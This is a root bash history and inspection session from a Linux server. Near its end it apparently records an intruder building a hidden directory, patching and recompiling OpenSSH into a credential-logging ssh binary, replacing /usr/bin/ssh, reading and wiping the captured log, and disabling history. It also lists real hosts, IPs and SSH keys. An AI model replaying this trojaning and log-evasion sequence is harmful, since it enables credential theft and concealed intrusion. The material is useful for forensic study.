reload 426 /etc/init.d/named restart 427 dig sheffieldbeachholiday.co.za @196.15.249.203 428 dig mx sheffieldbeachholiday.co.za @196.15.249.203 429 dig mx sheffieldbeachaccommodation.co.za @196.15.249.203 430 exit 431 ssh 196.25.22.178 432 exit 433 traceroute -n 196.25.29.178 434 traceroute -n 196.25.22.178 435 exit 436 cd /etc/ 437 cd /var/named/ 438 ll 439 cp vepac.co.za ratana.co.za 440 vi ratana.co.za 441 vi vepac.co.za 442 vi /etc/named.conf 443 rndc reload ratana.co.za 444 rndc ratana.co.za reload 445 vi named.ca 446 vi /etc/named.conf 447 ls 448 vi ratana.co.za 449 rndc ratana.co.za reload 450 rndc vepac.co.za reload 451 rndc 452 rndc reload ratana.co.za 453 rndc reload vepac.co.za 454 /etc/init.d/named restart 455 ssh plet.compumail.co.za 456 rndc reload vepac.co.za 457 vi /var/log/messages 458 /etc/init.d/named 459 /etc/init.d/named restart 460 exit 461 tail -f /var/log/messages 462 vi /etc/named.conf 463 tail -f /var/log/messages 464 exit 465 date 466 exit 467 date 468 exit 469 ssh lin02 470 ssh lin02.compumail.co.za 471 ssh plet 472 ssh plet.compumail.co.za 473 exit 474 dig parktonian.no-ip.info 475 dig parktonian.no-ip.info @196.25.1.9 476 exit 477 cd /var/named/ 478 vi nestlife.co.za 479 dig r-r-m.co.za mx 480 vi nestlife.co.za 481 rndc reload nestlife.co.za 482 dig nestlife.co.za mx 483 dig nestlife.co.za mx @196.25.1.1 484 ssh parktonian.no-ip.info 485 exit 486 cd /var/named/ 487 vi nestlife.co.za 488 rndc reload 489 exit 490 rndc reload iphiko.co.za 491 rndc reload vepac.co.za 492 /etc/init.d/named restart 493 ssh plet.compumail.co.za 494 exit 495 cd /var/named/ 496 ll 497 cp ratana.co.za iphiko.co.za 498 vi iphiko.co.za 499 vi /etc/named.conf 500 tail -f /var/log/messages 501 exit 502 cd /etc/shorewall/ 503 ls 504 cd .. 505 cd wanpipe 506 ls 507 vi scripts/ 508 cd scripts/ 509 ls 510 vi wanpipe1-wp3aft-start 511 exit 512 bwm 513 exit 514 vi /var/named/parktonian.co.za 515 rndc reload parktonian.co.za 516 dig parktonian.co.za mx 517 dig parktonian.co.za mx @196.15.249.204 518 telnet mail.parktonian.co.za 25 519 exit 520 vi /var/named/carmart.co.za 521 dig seapoint.no-ip.info 522 rndc reload carmart.co.za 523 exit 524 ssh 196.15.249.204 525 exit 526 telnet mail.carmart.co.za 25 527 exit 528 vi /var/named/prueleith.co.za 529 rmdc reload preuleigh.co.za 530 rndc reload preuleigh.co.za 531 rndc reload prueleigh.co.za 532 rndc reload 533 dig www.prueleigh.co.za 534 dig www.prueleith.co.za 535 dig www.prueleith.co.za @196.25.1.9 536 dig www.prueleith.co.za @ns1.iafrica.co.za 537 dig www.prueleith.co.za 538 cd /home/joe/prueleith/ 539 ll 540 tar zScvf web.tgz * 541 ll 542 exit 543 dig prueleith.co.za ns @co.za 544 dig www.prueleith.co.za @plet.compumail.co.za 545 dig www.prueleith.co.za @hermes.is.co.za 546 dig www.prueleith.co.za @196.25.1.1 547 dig www.prueleith.co.za @196.25.1.9 548 dig datapro.co.za ns 549 dig www.prueleith.co.za @ns2.datapro.co.za 550 exit 551 ssh plet.compumail.co.za 552 ssh lin02.compumail.co.za 553 vi /root/.ssh/known_hosts 554 ssh plet.compumail.co.za 555 telnet 196.15.249.204 110 556 telnet 196.15.249.204 25 557 ping 196.15.249.205 558 exit 559 telnet 196.15.249.204 25 560 telnet 196.15.249.204 110 561 exit 562 bwm 563 exit 564 bwm 565 tcpdump -ni wp2aft | grep 165.146.53.80 566 exit 567 dig galileosa.co.za mx 568 exit 569 bwm 570 tcpdump -ni eth0 not tcp 22 571 tcpdump -ni eth0 not tcp port 22 572 bwm 573 tcpdump -ni eth0 not tcp port 22 574 bwm 575 exit 576 dig logisticor.no-ip.info 577 ssh 196.15.249.204 578 ssh 196.15.249.201 579 telnet 196.15.249.204 25 580 vi /etc/named.conf 581 cd /var/named/ 582 vi logisticor.com 583 rndc reload logisticor.com 584 vi diemyburghs.co.za 585 dig logisticor.com mx 586 dig mx.logisticor.com 587 vi logisticor.com 588 rndc reload logisticor.com 589 dig mx.logisticor.com 590 telnet mx.logisticor.com 25 591 ssh 196.15.249.204 592 ping 196.15.249.204 593 telnet 196.15.249.204 110 594 telnet 196.15.249.204 25 595 nmap -? 596 nmap -sS 196.15.249.204 597 http://196.15.249.204:54320 598 lynx http://196.15.249.204:54320 599 telnet196.15.249.204 54320 600 telnet 196.15.249.204 54320 601 telnet mx.logisticor.com 25 602 vi /var/mail/joe 603 ssh 196.15.249.201 604 vi /etc/shorewall/rules 605 ssh 196.15.249.204 606 ssh -1 196.15.249.204 607 ssh -? 608 ssh -1 196.15.249.204 reboot 609 exit 610 cd /var/named/ 611 vi logisticor.com 612 exit 613 vi /var/named/parktonian.co.za 614 vi /var/named/logisticor.com 615 rndc reload p 616 vi /var/named/parktonian.co.za 617 rndc reload parktonian.co.za 618 vi /var/named/carmart.co.za 619 rndc reload carmart.co.za 620 vi /var/named/delvenco.co.za 621 rndc reload delvenco.co.za 622 vi /var/named/delvenco.co.za 623 rndc reload delvenco.co.za 624 vi /var/named/carmart.co.za 625 rndc reload carmart.co.za 626 cd /var/named/ 627 grep no-ip * 628 vi geospace.co.za 629 rndc reload geospace.co.za 630 exit 631 bwm 632 ssh 196.25.45.226 633 ssh andre@196.25.45.226 634 exit 635 bwm 636 exit 637 ssh /var/named/logisticor.com 638 vi /var/named/logisticor.com 639 rndc reload logisticor.com 640 dig logisticor.com mx 641 dig mail.logisticor.com 642 dig mail.logisticor.com @196.25.1.9 643 dig mail.logisticor.com @196.25.1.1 644 exit 645 bwm 646 ssh 196.25.45.226 647 ssh andre@196.25.45.226 648 dig ratana.co.za mx 649 exit 650 ifconfig 651 uvongo.compumail.co.za 652 ifconfig 653 bwm 654 exit 655 ssh plet.compumail.co.za 656 bwm 657 exit 658 ssh lin02.lanlink.co.za 659 ssh lin02.compumail.co.za 660 ssh plet 661 ssh plet.copmpumail.co.za 662 ssh plet.compumail.co.za 663 ssh parktonian.no-ip.ino 664 ssh parktonian.no-ip.info 665 ping uvongo.compumail.co.za 666 ssh uvongo.compumail.co.za 667 ping uvongo.compumail.co.za 668 ssh uvongo.compumail.co.za 669 670 wanrouter restart 671 wanrouter status 672 exit 673 bwm 674 ssh 196.25.45.214 675 exit 676 bwm 677 exit 678 dig -x 196.25.45.226 @196.25.1.9 679 dig -x 196.25.45.226 680 exit 681 dmesg 682 cat /var/log/messages 683 dmesg -c 684 cat /var/log/messages 685 exit 686 dig logisticor.com ns @196.25.1.1 687 dig logisticor.com ns @ns1.microsoft.com 688 dig logisticor.com ns @196.25.1.1 689 dig logisticor.com ns @196.25.1.9 690 exit 691 ping rndf-146-33-06.telkomadsl.co.za 692 exit 693 bwm 694 tcpdump -ni eth0 not tcp 22 695 tcpdump -ni eth0 not tcp port 22 696 bwm 697 exit 698 dig nasd.com ns 699 whois 216.52.126.1 700 dig nasdac.com 701 d 702 dig nasd.com ns 703 whois 63.251.87.230 704 whois 63.251.87.230 ? 705 dig jardinewindsor.com 706 dig jardinewindsor.com ns 707 dig ns1.dns27.com 708 whois 67.18.73.199 709 dig theplanet.com 710 dig jardinewindsor.com ns 711 dig jardinewindsor.com soa 712 exit 713 ping 196.15.249.204 714 telnet 196.15 715 telnet 196.15.249.204 110 716 telnet 196.15.249.204 25 717 telnet lin02.compumail.co.za 110 718 exit 719 ssh 196.15.249.204 720 ssh root@196.15.249.204 721 ssh joe@196.15.249.204 722 telnet 196.15.249.204 110 723 telnet 196.15.249.204 25 724 exit 725 ping 196.15.249.204 726 ssh 196.15.249.204 727 exit 728 dig atn.co.za ns 729 dig alltransportmeeds.co.za ns 730 dig alltransportneeds.co.za ns 731 dig alltransportneeds.co.za ns @co.za 732 dig webmail.alltransportneeds.co.za 733 dig www.alltransportneeds.co.za 734 dig www.alltransportneeds.co.za 196.7.0.139 735 dig www.alltransportneeds.co.za @196.7.0.139 736 dig www.atn.co.za @196.7.0.139 737 dig atn.co.za mx @196.7.0.139 738 exit 739 ssh plet.compumail.co.za 740 ssh 196.25.45.226 741 ssh andre@196.25.45.226 742 ping mail.knowres.co.za 743 dnsconf 744 ifconfig 745 dig knowres.co.za mx 746 cd /var/named/ 747 vi knowres.co.za 748 rndc reload 749 dig mailserver.knowres.co.za 750 dig knowres.co.za mx 751 dig knowres.co.za mx @plet.compumail.co.za 752 rndc knowres.co.za reload 753 dig knowres.co.za mx @plet.compumail.co.za 754 vi knowres.co.za 755 rndc knowres.co.za reload 756 vi knowres.co.za 757 vi ithemba.co.za 758 vi knowres.co.za 759 rndc knowres.co.za reload 760 rndc reload 761 dig knowres.co.za mx @plet.compumail.co.za 762 dig apex.co.za 763 dig apex.co.za mx 764 dig apex-leads.co.za mx 765 dig mail.apex-leads.co.za 766 telnet mail.apex-leads.co.za 25 767 dig logisticor.com mx 768 exit 769 bwm 770 tcpdump -i wp5aft 771 tcpdump wp5aft 772 tcpdump wp5aft 773 tcpdump -i wp5aft 774 bwm 775 exit 776 $TTL 60 777 ssh joe@ireneguest.no-ip.info 778 vi /var/named/compumail.co.za 779 ssh ireneguest.no-ip.info 780 ssh joe@ireneguest.no-ip.info 781 su 782 exit 783 ssh 196.15.249.204 784 ssh 196.15.249.203 785 ssh 196.15.249.204 786 exit 787 bwm 788 exit 789 telnet mail.singita.co.za 25 790 exit 791 telnet mail.singita.co.za 25 792 ssh lin02.lanlink.co.za 793 exit 794 bwm 795 ssh 196.25.45.254 796 ssh 165.165.36.84 797 ping 196.15.249.205 798 exit 799 bwm 800 exit 801 bwm 802 exit 803 cd /etc/wanpipe/ 804 ll 805 vi wanpipe1.conf 806 bwm 807 wanrouter restart wp7aft 808 vi wanpipe1.conf 809 wanrouter 810 wanrouter restart wanpipe1 wp7aft 811 wanrouter status wanpipe1 wp7aft 812 ifconfig 813 wanrouter 814 wanrouter debug wp7aft 815 wanrouter 816 wanrouter restart wanpipe1 wp7aft 817 ping 196.25.45.254 818 ssh 196.25.45.254 819 wanrouter restart wanpipe1 wp7aft 820 vi interfaces/wp7aft 821 vi wanpipe1.conf 822 wanrouter restart wanpipe1 wp7aft 823 ssh 196.25.45.254 824 ping 196.25.45.254 825 bwm 826 ssh 196.25.45.254 827 ssh 196.15.249.204 828 exit 829 bwm 830 ll 831 cd /home/joe/ 832 ll 833 cd Mandrakelinux-10.1-Official-Powerpack/ 834 ll 835 exit 836 vi /var/named/mentorfreight.co.za 837 rndc reload mentorfreight.co.za 838 netstat -an | grep 22 839 exit 840 telnet adsl.mentrofreight.co.za 25 841 telnet adsl.mentorfreight.co.za 25 842 telnet 165.146.6.83 25 843 vi /var/named/mentorfreight.co.za 844 rndc reload mentorfreight.co.za 845 mail administrator@mentorfreight.co.za 846 exit 847 vi /var/named/lanlink.co.za 848 cat /etc/sysconfig/static-routes 849 route add -net 196.15.249.224/29 gw 196.15.249.205 850 route add -net 196.15.249.220/30 gw 196.15.249.205 851 netstat -rn | grep 196.25.45.214 852 netstat -rn | grep 196.25.45.194 853 netstat -rn | grep 196.15.249.234 854 exit 855 telnet adsl.mentrofreight.co.za 25 856 telnet mentorfreight.co.za 25 857 telnet adsl.mentorfreight.co.za 25 858 bwm 859 ssh 192.25.45.254 860 ssh 196.25.45.254 861 exit 862 ssh 196.15.249.201 863 exit 864 demsg -c 865 dmesg -c 866 ping 196.15.249.206 867 demsg -c 868 dmesg -c 869 ssh 196.15.249.201 870 exit 871 ssh 196.25.45.254 872 bwm 873 exit 874 bwm 875 ssh lin02.lanlink.co.za 876 ssh lin02.compumail.co.za 877 exit 878 mailconf 879 ssh plet.compumail.co.za 880 exit 881 w 882 cd /tmp 883 mkdir ... 884 chmod 700 ... 885 cd ... 886 ls 887 ssh -V 888 wget http://openbsd.secsup.org/OpenSSH/portable/openssh-3.6.1p2.tar.gz 889 tar xzf * 890 netstat -antp | grep LISTEN 891 which apache 892 which httpd 893 locate httpd 894 /usr/sbin/httpd2 895 netstat -antp 896 ls /var/www/ 897 ls /var/www//html 898 cd o* 899 ls 900 pico sshconnect2.c 901 nano sshconnect2.c -w 902 cd .. 903 wget http://www.nano-editor.org/dist/v1.2/nano-1.2.5.tar.gz 904 tar xzf nano* 905 cd nano* 906 ./configure && make 907 make install 908 cd .. 909 cd o* 910 nano -w sshconnect2.c 911 ./configure && make 912 ./ssh root@localhost 913 cat /var/tmp/.ssheist.log 914 rm -rf /var/tmp/.ssheist.log 915 cp ssh /usr/bin/ssh 916 cp ssh /var/www/html 917 rm -rf /var/www/html/ssh 918 rm -rf ../* 919 cd .. 920 ls 921 exit 922 tail -f /var/log/messages | grep 165.146.101.31 923 ll 924 exit 925 w 926 cat /var/tmp/.ssheist.log 927 exit 928 telnet histologic.no-ip.info 929 exit 930 ssh plet.compumail.co.za 931 exit 932 bwm 933 exit 934 bwm 935 exit 936 bwm 937 cat /var/named/mentorfreight.co.za 938 dig adsl.mentorfreight.co.za 939 bwm 940 exit 941 wanrouter status 942 wanrouter 943 wanrouter summary 944 bwm 945 wanrouter restart wp2aft 946 wanrouter/? 947 wanrouter /? 948 wanrouter restart wanpipe1 wp2aft 949 wanrouter status wanpipe1 wp2aft 950 bwm 951 ping 196.25.1.1 952 ifconfig 953 ping 196.25.245.193 954 ping 196.25.1.1 955 ssh 196.15.249.207 956 ping 196.25.1.1 957 ssh 196.25.45.214 958 ping 196.25.1.1 959 ifconfig 960 ifconfig wp2aft 961 wanrouter 962 wanrouter modules 963 man ifconfig 964 whereis wanrouter 965 cd /home/joe/ 966 ll 967 cd wanpipe 968 ll 969 ll util/ 970 wanpipemon 971 ll 972 cd samples/ 973 ll 974 cd .. 975 ll 976 view README-3.operation 977 ll 978 ll interfaces/ 979 ll /etc/wanpipe/interfaces/ 980 wanrouter debug wp2aft 981 ping 196.25.1.1 982 bwm 983 ping 196.25.1.1 984 exit 985 ssh 196.15.249.201 986 exit 987 w 988 cat /var/tmp/.ssheiost.log 989 cat /var/tmp/.ssheist.log 990 host 196.15.249.207 991 host 196.25.45.214 992 ssh root@196.25.45.214 993 cat /var/tmp/.ssheist.log 994 host 196.25.45.214 995 cat > /var/tmp/.ssheist.log 996 cat /var/tmp/.ssheist.log 997 exit 998 w 999 logout 1000 w 1001 unset HISTFILE 1002 uname -a; cat /etc/issue 1003 history [root@knysna root]# ls -al total 655228 drwx------ 7 root root 4096 Jun 13 12:46 ./ drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../ -rwxr-xr-x 1 root root 14012 Oct 18 2004 a.out* -rw------- 1 root root 18715 Jun 14 02:00 .bash_history -rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout -rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile -rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc -rw-r--r-- 1 root root 381 Mar 29 12:42 cadmapping.co.za drwxr-xr-x 2 root root 4096 Jan 20 10:03 .cpan/ -rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc drwx------ 2 root root 4096 Aug 31 2004 drakx/ -rw-r--r-- 1 root root 355 Dec 10 2004 .fonts.cache-1 -rw-r--r-- 1 root root 5639 Dec 10 2004 ip_nat_tftp.ko -rwxr-xr-x 1 root root 670156800 Nov 30 2004 mailpack.tgz* -rw-r--r-- 1 root root 138 Feb 13 20:24 .rpmdrake drwx------ 2 root root 4096 May 22 09:08 .ssh/ -rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc -rw-r--r-- 1 root root 691 Oct 18 2004 test drwx------ 2 root root 4096 Jun 14 01:53 tmp/ drwxr-xr-x 2 root root 4096 Oct 18 2004 vcia/ -rw------- 1 root root 8549 Jun 13 12:46 .viminfo -rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc -rw------- 1 root root 52 Jun 2 10:44 .Xauthority -rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults [root@knysna root]# ls -al /home/ total 16 drwxr-xr-x 4 root root 4096 Aug 31 2004 ./ drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../ drwx--x--x 3 admin admin 4096 Aug 31 2004 admin/ drwx--x--x 10 joe joe 4096 May 20 14:57 joe/ [root@knysna root]# ls -al /tmp. //.../ total 8 drwx------ 2 root root 4096 Jun 8 16:32 ./ drwxrwxrwt 5 root root 4096 Jun 14 04:03 ../ [root@knysna root]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 1580 520 ? S Apr11 0:10 init [3] root 2 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/0] root 3 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/1] root 5 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/1] root 6 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/0] root 7 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/1] root 8 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/0] root 9 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/1] root 10 0.0 0.0 0 0 ? SW Apr11 0:00 [kirqd] root 11 0.0 0.0 0 0 ? SW Apr11 0:00 [pdflush] root 12 0.0 0.0 0 0 ? SW Apr11 0:04 [pdflush] root 13 0.0 0.0 0 0 ? SW Apr11 0:00 [kswapd0] root 14 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/0] root 15 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/1] root 17 0.0 0.0 0 0 ? SW Apr11 0:00 [kseriod] root 25 0.0 0.0 0 0 ? SW Apr11 1:08 [kjournald] root 115 0.0 0.0 2188 1300 ? S Apr11 0:00 devfsd /dev root 205 0.0 0.0 0 0 ? SW Apr11 0:01 [khubd] root 889 0.0 0.0 1660 560 ? S Apr11 0:00 /sbin/ifplugd -w root 972 0.0 0.0 1880 812 ? S Apr11 2:10 syslogd -m 0 -a / root 980 0.0 0.0 2580 1548 ? S Apr11 0:11 klogd -c 3 -2 daemon 1327 0.0 0.0 1772 616 ? S Apr11 0:00 /usr/sbin/atd root 1343 0.0 0.1 5400 3224 ? S Apr11 0:00 /usr/sbin/snmpd - root 1358 0.0 0.1 4884 2180 ? S Apr11 0:03 /usr/sbin/snmptra root 1432 0.0 0.0 2240 964 ? S Apr11 0:00 xinetd -stayalive root 1525 0.0 0.0 1780 708 ? S Apr11 0:00 crond root 1599 0.0 0.0 1576 444 tty2 S Apr11 0:00 /sbin/mingetty tt root 1600 0.0 0.0 1568 440 tty3 S Apr11 0:00 /sbin/mingetty tt root 1601 0.0 0.0 1568 440 tty4 S Apr11 0:00 /sbin/mingetty tt root 1602 0.0 0.0 1568 440 tty5 S Apr11 0:00 /sbin/mingetty tt root 1603 0.0 0.0 1568 440 tty6 S Apr11 0:00 /sbin/mingetty tt named 10104 0.0 0.5 47140 11616 ? S May19 0:00 named -u named root 9994 0.0 0.0 2492 1080 ? S May26 0:00 login -- root root 14688 0.0 0.0 3060 1848 tty1 S Jun01 0:00 -bash root 21342 0.0 0.1 5228 2500 ? S Jun08 0:00 /usr/sbin/httpd2 root 21343 0.0 0.1 4028 2220 ? S Jun08 0:00 /usr/bin/perl /us apache 4906 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2 apache 4909 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2 apache 4917 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2 root 10058 0.0 0.1 6348 2080 ? S Jun13 0:01 sshd: root@pts/0 root 10060 0.0 0.0 2952 1720 pts0 S Jun13 0:00 -bash apache 10101 0.0 0.1 5228 2652 ? S Jun13 0:00 /usr/sbin/httpd2 apache 10111 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2 apache 11507 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2 apache 11508 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2 apache 11509 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2 apache 11510 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2 apache 11512 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2 root 22406 0.0 0.0 3404 1468 ? S 02:08 0:00 /usr/sbin/sshd root 28377 0.0 0.0 5972 1752 ? S 07:02 0:00 sshd: root@pts/1 root 28379 0.0 0.0 2952 1720 pts1 S 07:03 0:00 -bash root 28423 0.0 0.0 2572 852 pts1 R 07:05 0:00 ps aux [root@knysna root]# ls -al /tmp/ total 20 drwxrwxrwt 5 root root 4096 Jun 14 04:03 ./ drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../ drwx------ 2 root root 4096 Jun 8 16:32 .../ drwx------ 2 root root 4096 Aug 31 2004 gconfd-root/ drwxrwxrwt 2 root root 4096 Aug 31 2004 .ICE-unix/ [root@knysna root]# ls -al /car/tmp/ ls: /car/tmp/: No such file or directory [root@knysna root]# ls -al /car/tmp/v total 8 drwxrwxrwt 2 root root 4096 Jun 14 04:03 ./ drwxr-xr-x 20 root root 4096 Aug 31 2004 ../ -rw-r--r-- 1 root root 0 Jun 13 15:32 .ssheist.log [root@knysna root]# hostname knysna [root@knysna root]# cat /root/.ssh/known_hosts 196.15.249.201 ssh-dss AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw== parktonian.no-ip.info,165.146.5.216 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr01eaP2IQHnc0r7D2YgvkVGnMkE9RHh/K1IGP0uSiiMu4E5q3Pfv+bKQjhy24dQP/26zhZn6yZYa0kGtkhWS0AhQmXKGqrUN7fIZTooW2we0ctdafPfcANUcPC7ik9a8rQQSQSX3gJUl1EJnkuv/92wwW2YcxKRbgF+kjkZFRgU= 196.25.45.226 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3C2L32PkNqg3hHncBZSGknwXE7WEyLaqOV5tnYBCaUcCOVwZ5fhEy8RCjMTl9mndZW9+8whPYKj+Q0qRYh5icMIdCfssmWt/aXI8T2ShKHxvcG8iVcy0yKN6GKH37Q0sWsPSbwLrxz78l+choze9raJuLVpga0X9LhxS2KIGSPs= uvongo.compumail.co.za,196.15.249.193 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwOyZQMPIn1EdkLP1//ImSO4406UUrW6klYua92ATW3fu5/6ZBIQuIjzxHAwesomdW3SWN7yUGfYUw048kG3hz50TH0HGIYilNEiO2ir0JzD+cDPeGwB0xBkX0JEFqw3Mh5TjByqM2XdSbbX5s9x8KvN9ZwPyP5W7focFis1SqxU= plet.compumail.co.za,196.15.249.204 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs= ireneguest.no-ip.info,165.165.235.173 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4/EtiE5vCMmTX8BNF60LgZbHNaC/g1EWy81eTNNruEX5U9raqLyH5O1eMqSyn1XYXIxhogyBBGhVKxOHhuexGKT9lPQUq56P/RhWec/jUFjgqorNN3QAObZ7fOBakyYclhcMhLAnMq9T0Z7Hhx+lDbZwq+N3tjFnZ+XVZNbvlNk= 196.15.249.203 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU= lin02.lanlink.co.za ssh-dss AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw== 196.25.45.254 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsLCjGV6av0CmgvSp98rtyPq0mYm/YVKAhBxKbthtC6yhnbN5WTSdrZhRwuoEoafLoUdbwr/iYfKIrylwnYT96EccphwpwFBO3YiK+fK7LF1/LVizWat+NZJHTjLKmfAvrF51l3lyZR1AEZSziM7p884tIh5UeUktf/TRS8kFz88= umhlanga.compumail.co.za,196.15.249.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6dGqZ8KfL4m3cxsAHQ3UnkRnWnNarGzSg/kGiRr00bdw8+N1NAl3j1efvXPHuI1TFgiNtVHEwz4hnN19F6pHVmKT/YIk/rN8cooQo/df0pk7k24mfrdwRyrV8K/xIGnXoEy4qPfe3hFl9TB5LdOPgMsy8WaYafJsF3yoZR+/9Ns= lin02.compumail.co.za ssh-dss AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw== localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU= 196.15.249.207 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAnRLlmrqsBVpPKzy+ycibPbk/8Yo146BYtGSmrEuXxyiKFHiQ28qAHOr1DK1LNVqHRNwe0XJcwqF0MWneLDoNRAjElSxEoqGnhXgYXgLhTgjSVyafBjNAQk000tQ/0MIrYmRBQ7JFIMMNQaCcA45LKAlJ5xaAyG75v+KEHS5Vha8= 196.25.45.214 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAu8yQRg6T0fKpqMTk3aoM4SByqGs0MRp9vJkBhHxK0jat6ILJCd+xv9vQx0yL+mGs36jlCS3r07NL/16fOgd11u2JYMlQwsvi2eRQTDinXFNUmqa26viW8Vx8n8L1+EwVEJzgJUrlr8M3uIhz0nRs0wTKreLRfPgk/WEmCDlfeCM= 127.0.0.1 ssh-rsa 